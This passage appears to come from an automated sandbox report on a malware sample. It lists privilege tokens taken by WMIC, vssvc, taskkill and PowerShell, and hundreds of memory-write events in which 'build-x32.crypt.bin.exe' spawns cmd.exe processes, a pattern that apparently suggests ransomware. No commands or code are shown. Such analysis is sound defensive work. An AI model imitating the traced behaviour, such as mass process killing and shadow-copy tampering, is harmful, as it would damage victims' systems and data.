Token: SeIncreaseQuotaPrivilege	792	WMIC.exe
Token: SeSecurityPrivilege	792	WMIC.exe
Token: SeTakeOwnershipPrivilege	792	WMIC.exe
Token: SeLoadDriverPrivilege	792	WMIC.exe
Token: SeSystemProfilePrivilege	792	WMIC.exe
Token: SeSystemtimePrivilege	792	WMIC.exe
Token: SeProfSingleProcessPrivilege	792	WMIC.exe
Token: SeIncBasePriorityPrivilege	792	WMIC.exe
Token: SeCreatePagefilePrivilege	792	WMIC.exe
Token: SeBackupPrivilege	792	WMIC.exe
Token: SeRestorePrivilege	792	WMIC.exe
Token: SeShutdownPrivilege	792	WMIC.exe
Token: SeDebugPrivilege	792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	792	WMIC.exe
Token: SeRemoteShutdownPrivilege	792	WMIC.exe
Token: SeUndockPrivilege	792	WMIC.exe
Token: SeManageVolumePrivilege	792	WMIC.exe
Token: 33	792	WMIC.exe
Token: 34	792	WMIC.exe
Token: 35	792	WMIC.exe
Token: SeBackupPrivilege	1684	vssvc.exe
Token: SeRestorePrivilege	1684	vssvc.exe
Token: SeAuditPrivilege	1684	vssvc.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeDebugPrivilege	460	taskkill.exe
Token: SeDebugPrivilege	612	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	340	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	272	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	272	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	780	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe
Token: SeDebugPrivilege	1200	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	612	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	272	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1948	powershell.exe

Suspicious use of WriteProcessMemory 776 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 988	1480	build-x32.crypt.bin.exe	25
PID 1480 wrote to memory of 988	1480	build-x32.crypt.bin.exe	25
PID 1480 wrote to memory of 988	1480	build-x32.crypt.bin.exe	25
PID 1480 wrote to memory of 988	1480	build-x32.crypt.bin.exe	25
PID 988 wrote to memory of 792	988	cmd.exe	27
PID 988 wrote to memory of 792	988	cmd.exe	27
PID 988 wrote to memory of 792	988	cmd.exe	27
PID 988 wrote to memory of 792	988	cmd.exe	27
PID 1480 wrote to memory of 1776	1480	build-x32.crypt.bin.exe	30
PID 1480 wrote to memory of 1776	1480	build-x32.crypt.bin.exe	30
PID 1480 wrote to memory of 1776	1480	build-x32.crypt.bin.exe	30
PID 1480 wrote to memory of 1776	1480	build-x32.crypt.bin.exe	30
PID 1480 wrote to memory of 1384	1480	build-x32.crypt.bin.exe	32
PID 1480 wrote to memory of 1384	1480	build-x32.crypt.bin.exe	32
PID 1480 wrote to memory of 1384	1480	build-x32.crypt.bin.exe	32
PID 1480 wrote to memory of 1384	1480	build-x32.crypt.bin.exe	32
PID 1480 wrote to memory of 1880	1480	build-x32.crypt.bin.exe	34
PID 1480 wrote to memory of 1880	1480	build-x32.crypt.bin.exe	34
PID 1480 wrote to memory of 1880	1480	build-x32.crypt.bin.exe	34
PID 1480 wrote to memory of 1880	1480	build-x32.crypt.bin.exe	34
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	36
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	36
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	36
PID 1480 wrote to memory of 1848	1480	build-x32.crypt.bin.exe	36
PID 1480 wrote to memory of 1828	1480	build-x32.crypt.bin.exe	38
PID 1480 wrote to memory of 1828	1480	build-x32.crypt.bin.exe	38
PID 1480 wrote to memory of 1828	1480	build-x32.crypt.bin.exe	38
PID 1480 wrote to memory of 1828	1480	build-x32.crypt.bin.exe	38
PID 1828 wrote to memory of 756	1828	cmd.exe	40
PID 1828 wrote to memory of 756	1828	cmd.exe	40
PID 1828 wrote to memory of 756	1828	cmd.exe	40
PID 1828 wrote to memory of 756	1828	cmd.exe	40
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	41
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	41
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	41
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	41
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	43
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	43
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	43
PID 1480 wrote to memory of 1396	1480	build-x32.crypt.bin.exe	43
PID 1396 wrote to memory of 324	1396	cmd.exe	45
PID 1396 wrote to memory of 324	1396	cmd.exe	45
PID 1396 wrote to memory of 324	1396	cmd.exe	45
PID 1396 wrote to memory of 324	1396	cmd.exe	45
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	47
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	47
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	47
PID 1480 wrote to memory of 1644	1480	build-x32.crypt.bin.exe	47
PID 1644 wrote to memory of 1552	1644	cmd.exe	49
PID 1644 wrote to memory of 1552	1644	cmd.exe	49
PID 1644 wrote to memory of 1552	1644	cmd.exe	49
PID 1644 wrote to memory of 1552	1644	cmd.exe	49
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	50
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	50
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	50
PID 1480 wrote to memory of 1948	1480	build-x32.crypt.bin.exe	50
PID 1948 wrote to memory of 1988	1948	cmd.exe	52
PID 1948 wrote to memory of 1988	1948	cmd.exe	52
PID 1948 wrote to memory of 1988	1948	cmd.exe	52
PID 1948 wrote to memory of 1988	1948	cmd.exe	52
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	53
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	53
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	53
PID 1480 wrote to memory of 1984	1480	build-x32.crypt.bin.exe	53
PID 1984 wrote to memory of 2028	1984	cmd.exe	55
PID 1984 wrote to memory of 2028	1984	cmd.exe	55
PID 1984 wrote to memory of 2028	1984	cmd.exe	55
PID 1984 wrote to memory of 2028	1984	cmd.exe	55
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	56
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	56
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	56
PID 1480 wrote to memory of 1412	1480	build-x32.crypt.bin.exe	56
PID 1412 wrote to memory of 1252	1412	cmd.exe	58
PID 1412 wrote to memory of 1252	1412	cmd.exe	58
PID 1412 wrote to memory of 1252	1412	cmd.exe	58
PID 1412 wrote to memory of 1252	1412	cmd.exe	58
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	59
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	59
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	59
PID 1480 wrote to memory of 1500	1480	build-x32.crypt.bin.exe	59
PID 1500 wrote to memory of 1060	1500	cmd.exe	61
PID 1500 wrote to memory of 1060	1500	cmd.exe	61
PID 1500 wrote to memory of 1060	1500	cmd.exe	61
PID 1500 wrote to memory of 1060	1500	cmd.exe	61
PID 1480 wrote to memory of 1764	1480	build-x32.crypt.bin.exe	62
PID 1480 wrote to memory of 1764	1480	build-x32.crypt.bin.exe	62
PID 1480 wrote to memory of 1764	1480	build-x32.crypt.bin.exe	62
PID 1480 wrote to memory of 1764	1480	build-x32.crypt.bin.exe	62
PID 1764 wrote to memory of 792	1764	cmd.exe	64
PID 1764 wrote to memory of 792	1764	cmd.exe	64
PID 1764 wrote to memory of 792	1764	cmd.exe	64
PID 1764 wrote to memory of 792	1764	cmd.exe	64
PID 1480 wrote to memory of 1324	1480	build-x32.crypt.bin.exe	65
PID 1480 wrote to memory of 1324	1480	build-x32.crypt.bin.exe	65
PID 1480 wrote to memory of 1324	1480	build-x32.crypt.bin.exe	65
PID 1480 wrote to memory of 1324	1480	build-x32.crypt.bin.exe	65
PID 1324 wrote to memory of 1112	1324	cmd.exe	67
PID 1324 wrote to memory of 1112	1324	cmd.exe	67
PID 1324 wrote to memory of 1112	1324	cmd.exe	67
PID 1324 wrote to memory of 1112	1324	cmd.exe	67
PID 1480 wrote to memory of 1868	1480	build-x32.crypt.bin.exe	68
PID 1480 wrote to memory of 1868	1480	build-x32.crypt.bin.exe	68
PID 1480 wrote to memory of 1868	1480	build-x32.crypt.bin.exe	68
PID 1480 wrote to memory of 1868	1480	build-x32.crypt.bin.exe	68
PID 1868 wrote to memory of 1860	1868	cmd.exe	70
PID 1868 wrote to memory of 1860	1868	cmd.exe	70
PID 1868 wrote to memory of 1860	1868	cmd.exe	70
PID 1868 wrote to memory of 1860	1868	cmd.exe	70
PID 1480 wrote to memory of 452	1480	build-x32.crypt.bin.exe	71
PID 1480 wrote to memory of 452	1480	build-x32.crypt.bin.exe	71
PID 1480 wrote to memory of 452	1480	build-x32.crypt.bin.exe	71
PID 1480 wrote to memory of 452	1480	build-x32.crypt.bin.exe	71
PID 452 wrote to memory of 460	452	cmd.exe	73
PID 452 wrote to memory of 460	452	cmd.exe	73
PID 452 wrote to memory of 460	452	cmd.exe	73
PID 452 wrote to memory of 460	452	cmd.exe	73
PID 1480 wrote to memory of 1524	1480	build-x32.crypt.bin.exe	74
PID 1480 wrote to memory of 1524	1480	build-x32.crypt.bin.exe	74
PID 1480 wrote to memory of 1524	1480	build-x32.crypt.bin.exe	74
PID 1480 wrote to memory of 1524	1480	build-x32.crypt.bin.exe	74
PID 1524 wrote to memory of 612	1524	cmd.exe	76
PID 1524 wrote to memory of 612	1524	cmd.exe	76
PID 1524 wrote to memory of 612	1524	cmd.exe	76
PID 1524 wrote to memory of 612	1524	cmd.exe	76
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	77
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	77
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	77
PID 1480 wrote to memory of 1620	1480	build-x32.crypt.bin.exe	77
PID 1620 wrote to memory of 1960	1620	cmd.exe	79
PID 1620 wrote to memory of 1960	1620	cmd.exe	79
PID 1620 wrote to memory of 1960	1620	cmd.exe	79
PID 1620 wrote to memory of 1960	1620	cmd.exe	79
PID 1480 wrote to memory of 1928	1480	build-x32.crypt.bin.exe	80
PID 1480 wrote to memory of 1928	1480	build-x32.crypt.bin.exe	80
PID 1480 wrote to memory of 1928	1480	build-x32.crypt.bin.exe	80
PID 1480 wrote to memory of 1928	1480	build-x32.crypt.bin.exe	80
PID 1928 wrote to memory of 2024	1928	cmd.exe	82
PID 1928 wrote to memory of 2024	1928	cmd.exe	82
PID 1928 wrote to memory of 2024	1928	cmd.exe	82
PID 1928 wrote to memory of 2024	1928	cmd.exe	82
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	83
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	83
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	83
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	83
PID 2004 wrote to memory of 1812	2004	cmd.exe	85
PID 2004 wrote to memory of 1812	2004	cmd.exe	85
PID 2004 wrote to memory of 1812	2004	cmd.exe	85
PID 2004 wrote to memory of 1812	2004	cmd.exe	85
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	86
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	86
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	86
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	86
PID 1372 wrote to memory of 1184	1372	cmd.exe	88
PID 1372 wrote to memory of 1184	1372	cmd.exe	88
PID 1372 wrote to memory of 1184	1372	cmd.exe	88
PID 1372 wrote to memory of 1184	1372	cmd.exe	88
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	89
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	89
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	89
PID 1480 wrote to memory of 1516	1480	build-x32.crypt.bin.exe	89
PID 1516 wrote to memory of 1604	1516	cmd.exe	91
PID 1516 wrote to memory of 1604	1516	cmd.exe	91
PID 1516 wrote to memory of 1604	1516	cmd.exe	91
PID 1516 wrote to memory of 1604	1516	cmd.exe	91
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	92
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	92
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	92
PID 1480 wrote to memory of 1152	1480	build-x32.crypt.bin.exe	92
PID 1152 wrote to memory of 340	1152	cmd.exe	94
PID 1152 wrote to memory of 340	1152	cmd.exe	94
PID 1152 wrote to memory of 340	1152	cmd.exe	94
PID 1152 wrote to memory of 340	1152	cmd.exe	94
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	95
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	95
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	95
PID 1480 wrote to memory of 1108	1480	build-x32.crypt.bin.exe	95
PID 1108 wrote to memory of 1872	1108	cmd.exe	97
PID 1108 wrote to memory of 1872	1108	cmd.exe	97
PID 1108 wrote to memory of 1872	1108	cmd.exe	97
PID 1108 wrote to memory of 1872	1108	cmd.exe	97
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	98
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	98
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	98
PID 1480 wrote to memory of 1832	1480	build-x32.crypt.bin.exe	98
PID 1832 wrote to memory of 572	1832	cmd.exe	100
PID 1832 wrote to memory of 572	1832	cmd.exe	100
PID 1832 wrote to memory of 572	1832	cmd.exe	100
PID 1832 wrote to memory of 572	1832	cmd.exe	100
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	101
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	101
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	101
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	101
PID 516 wrote to memory of 1348	516	cmd.exe	103
PID 516 wrote to memory of 1348	516	cmd.exe	103
PID 516 wrote to memory of 1348	516	cmd.exe	103
PID 516 wrote to memory of 1348	516	cmd.exe	103
PID 1480 wrote to memory of 1632	1480	build-x32.crypt.bin.exe	104
PID 1480 wrote to memory of 1632	1480	build-x32.crypt.bin.exe	104
PID 1480 wrote to memory of 1632	1480	build-x32.crypt.bin.exe	104
PID 1480 wrote to memory of 1632	1480	build-x32.crypt.bin.exe	104
PID 1632 wrote to memory of 1396	1632	cmd.exe	106
PID 1632 wrote to memory of 1396	1632	cmd.exe	106
PID 1632 wrote to memory of 1396	1632	cmd.exe	106
PID 1632 wrote to memory of 1396	1632	cmd.exe	106
PID 1480 wrote to memory of 1932	1480	build-x32.crypt.bin.exe	107
PID 1480 wrote to memory of 1932	1480	build-x32.crypt.bin.exe	107
PID 1480 wrote to memory of 1932	1480	build-x32.crypt.bin.exe	107
PID 1480 wrote to memory of 1932	1480	build-x32.crypt.bin.exe	107
PID 1932 wrote to memory of 1644	1932	cmd.exe	109
PID 1932 wrote to memory of 1644	1932	cmd.exe	109
PID 1932 wrote to memory of 1644	1932	cmd.exe	109
PID 1932 wrote to memory of 1644	1932	cmd.exe	109
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	110
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	110
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	110
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	110
PID 1992 wrote to memory of 1908	1992	cmd.exe	112
PID 1992 wrote to memory of 1908	1992	cmd.exe	112
PID 1992 wrote to memory of 1908	1992	cmd.exe	112
PID 1992 wrote to memory of 1908	1992	cmd.exe	112
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	113
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	113
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	113
PID 1480 wrote to memory of 1140	1480	build-x32.crypt.bin.exe	113
PID 1140 wrote to memory of 2028	1140	cmd.exe	115
PID 1140 wrote to memory of 2028	1140	cmd.exe	115
PID 1140 wrote to memory of 2028	1140	cmd.exe	115
PID 1140 wrote to memory of 2028	1140	cmd.exe	115
PID 1480 wrote to memory of 1476	1480	build-x32.crypt.bin.exe	116
PID 1480 wrote to memory of 1476	1480	build-x32.crypt.bin.exe	116
PID 1480 wrote to memory of 1476	1480	build-x32.crypt.bin.exe	116
PID 1480 wrote to memory of 1476	1480	build-x32.crypt.bin.exe	116
PID 1476 wrote to memory of 1412	1476	cmd.exe	118
PID 1476 wrote to memory of 1412	1476	cmd.exe	118
PID 1476 wrote to memory of 1412	1476	cmd.exe	118
PID 1476 wrote to memory of 1412	1476	cmd.exe	118
PID 1480 wrote to memory of 300	1480	build-x32.crypt.bin.exe	119
PID 1480 wrote to memory of 300	1480	build-x32.crypt.bin.exe	119
PID 1480 wrote to memory of 300	1480	build-x32.crypt.bin.exe	119
PID 1480 wrote to memory of 300	1480	build-x32.crypt.bin.exe	119
PID 300 wrote to memory of 1020	300	cmd.exe	121
PID 300 wrote to memory of 1020	300	cmd.exe	121
PID 300 wrote to memory of 1020	300	cmd.exe	121
PID 300 wrote to memory of 1020	300	cmd.exe	121
PID 1480 wrote to memory of 1784	1480	build-x32.crypt.bin.exe	122
PID 1480 wrote to memory of 1784	1480	build-x32.crypt.bin.exe	122
PID 1480 wrote to memory of 1784	1480	build-x32.crypt.bin.exe	122
PID 1480 wrote to memory of 1784	1480	build-x32.crypt.bin.exe	122
PID 1784 wrote to memory of 1764	1784	cmd.exe	124
PID 1784 wrote to memory of 1764	1784	cmd.exe	124
PID 1784 wrote to memory of 1764	1784	cmd.exe	124
PID 1784 wrote to memory of 1764	1784	cmd.exe	124
PID 1480 wrote to memory of 1852	1480	build-x32.crypt.bin.exe	125
PID 1480 wrote to memory of 1852	1480	build-x32.crypt.bin.exe	125
PID 1480 wrote to memory of 1852	1480	build-x32.crypt.bin.exe	125
PID 1480 wrote to memory of 1852	1480	build-x32.crypt.bin.exe	125
PID 1852 wrote to memory of 1756	1852	cmd.exe	127
PID 1852 wrote to memory of 1756	1852	cmd.exe	127
PID 1852 wrote to memory of 1756	1852	cmd.exe	127
PID 1852 wrote to memory of 1756	1852	cmd.exe	127
PID 1480 wrote to memory of 1360	1480	build-x32.crypt.bin.exe	128
PID 1480 wrote to memory of 1360	1480	build-x32.crypt.bin.exe	128
PID 1480 wrote to memory of 1360	1480	build-x32.crypt.bin.exe	128
PID 1480 wrote to memory of 1360	1480	build-x32.crypt.bin.exe	128
PID 1360 wrote to memory of 1868	1360	cmd.exe	130
PID 1360 wrote to memory of 1868	1360	cmd.exe	130
PID 1360 wrote to memory of 1868	1360	cmd.exe	130
PID 1360 wrote to memory of 1868	1360	cmd.exe	130
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	131
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	131
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	131
PID 1480 wrote to memory of 560	1480	build-x32.crypt.bin.exe	131
PID 560 wrote to memory of 272	560	cmd.exe	133
PID 560 wrote to memory of 272	560	cmd.exe	133
PID 560 wrote to memory of 272	560	cmd.exe	133
PID 560 wrote to memory of 272	560	cmd.exe	133
PID 1480 wrote to memory of 324	1480	build-x32.crypt.bin.exe	134
PID 1480 wrote to memory of 324	1480	build-x32.crypt.bin.exe	134
PID 1480 wrote to memory of 324	1480	build-x32.crypt.bin.exe	134
PID 1480 wrote to memory of 324	1480	build-x32.crypt.bin.exe	134
PID 324 wrote to memory of 1624	324	cmd.exe	136
PID 324 wrote to memory of 1624	324	cmd.exe	136
PID 324 wrote to memory of 1624	324	cmd.exe	136
PID 324 wrote to memory of 1624	324	cmd.exe	136
PID 1480 wrote to memory of 1952	1480	build-x32.crypt.bin.exe	137
PID 1480 wrote to memory of 1952	1480	build-x32.crypt.bin.exe	137
PID 1480 wrote to memory of 1952	1480	build-x32.crypt.bin.exe	137
PID 1480 wrote to memory of 1952	1480	build-x32.crypt.bin.exe	137
PID 1952 wrote to memory of 1556	1952	cmd.exe	139
PID 1952 wrote to memory of 1556	1952	cmd.exe	139
PID 1952 wrote to memory of 1556	1952	cmd.exe	139
PID 1952 wrote to memory of 1556	1952	cmd.exe	139
PID 1480 wrote to memory of 1912	1480	build-x32.crypt.bin.exe	140
PID 1480 wrote to memory of 1912	1480	build-x32.crypt.bin.exe	140
PID 1480 wrote to memory of 1912	1480	build-x32.crypt.bin.exe	140
PID 1480 wrote to memory of 1912	1480	build-x32.crypt.bin.exe	140
PID 1912 wrote to memory of 1928	1912	cmd.exe	142
PID 1912 wrote to memory of 1928	1912	cmd.exe	142
PID 1912 wrote to memory of 1928	1912	cmd.exe	142
PID 1912 wrote to memory of 1928	1912	cmd.exe	142
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	143
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	143
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	143
PID 1480 wrote to memory of 1992	1480	build-x32.crypt.bin.exe	143
PID 1992 wrote to memory of 1364	1992	cmd.exe	145
PID 1992 wrote to memory of 1364	1992	cmd.exe	145
PID 1992 wrote to memory of 1364	1992	cmd.exe	145
PID 1992 wrote to memory of 1364	1992	cmd.exe	145
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	146
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	146
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	146
PID 1480 wrote to memory of 2004	1480	build-x32.crypt.bin.exe	146
PID 2004 wrote to memory of 1984	2004	cmd.exe	148
PID 2004 wrote to memory of 1984	2004	cmd.exe	148
PID 2004 wrote to memory of 1984	2004	cmd.exe	148
PID 2004 wrote to memory of 1984	2004	cmd.exe	148
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	149
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	149
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	149
PID 1480 wrote to memory of 1372	1480	build-x32.crypt.bin.exe	149
PID 1372 wrote to memory of 1476	1372	cmd.exe	151
PID 1372 wrote to memory of 1476	1372	cmd.exe	151
PID 1372 wrote to memory of 1476	1372	cmd.exe	151
PID 1372 wrote to memory of 1476	1372	cmd.exe	151
PID 1480 wrote to memory of 1052	1480	build-x32.crypt.bin.exe	152
PID 1480 wrote to memory of 1052	1480	build-x32.crypt.bin.exe	152
PID 1480 wrote to memory of 1052	1480	build-x32.crypt.bin.exe	152
PID 1480 wrote to memory of 1052	1480	build-x32.crypt.bin.exe	152
PID 1052 wrote to memory of 1020	1052	cmd.exe	154
PID 1052 wrote to memory of 1020	1052	cmd.exe	154
PID 1052 wrote to memory of 1020	1052	cmd.exe	154
PID 1052 wrote to memory of 1020	1052	cmd.exe	154
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	155
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	155
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	155
PID 1480 wrote to memory of 780	1480	build-x32.crypt.bin.exe	155
PID 780 wrote to memory of 1764	780	cmd.exe	157
PID 780 wrote to memory of 1764	780	cmd.exe	157
PID 780 wrote to memory of 1764	780	cmd.exe	157
PID 780 wrote to memory of 1764	780	cmd.exe	157
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	158
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	158
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	158
PID 1480 wrote to memory of 1884	1480	build-x32.crypt.bin.exe	158
PID 1884 wrote to memory of 1756	1884	cmd.exe	160
PID 1884 wrote to memory of 1756	1884	cmd.exe	160
PID 1884 wrote to memory of 1756	1884	cmd.exe	160
PID 1884 wrote to memory of 1756	1884	cmd.exe	160
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	161
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	161
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	161
PID 1480 wrote to memory of 1840	1480	build-x32.crypt.bin.exe	161
PID 1840 wrote to memory of 1868	1840	cmd.exe	163
PID 1840 wrote to memory of 1868	1840	cmd.exe	163
PID 1840 wrote to memory of 1868	1840	cmd.exe	163
PID 1840 wrote to memory of 1868	1840	cmd.exe	163
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	164
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	164
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	164
PID 1480 wrote to memory of 516	1480	build-x32.crypt.bin.exe	164
PID 516 wrote to memory of 272	516	cmd.exe	166
PID 516 wrote to memory of 272	516	cmd.exe	166
PID 516 wrote to memory of 272	516	cmd.exe	166
PID 516 wrote to memory of 272	516	cmd.exe	166
PID 1480 wrote to memory of 1200	1480	build-x32.crypt.bin.exe	167
PID 1480 wrote to memory of 1200	1480	build-x32.crypt.bin.exe	167
PID 1480 wrote to memory of 1200	1480	build-x32.crypt.bin.exe	167
PID 1480 wrote to memory of 1200	1480	build-x32.crypt.bin.exe	167
PID 1200 wrote to memory of 1624	1200	cmd.exe	169
PID 1200 wrote to memory of 1624	1200	cmd.exe	169
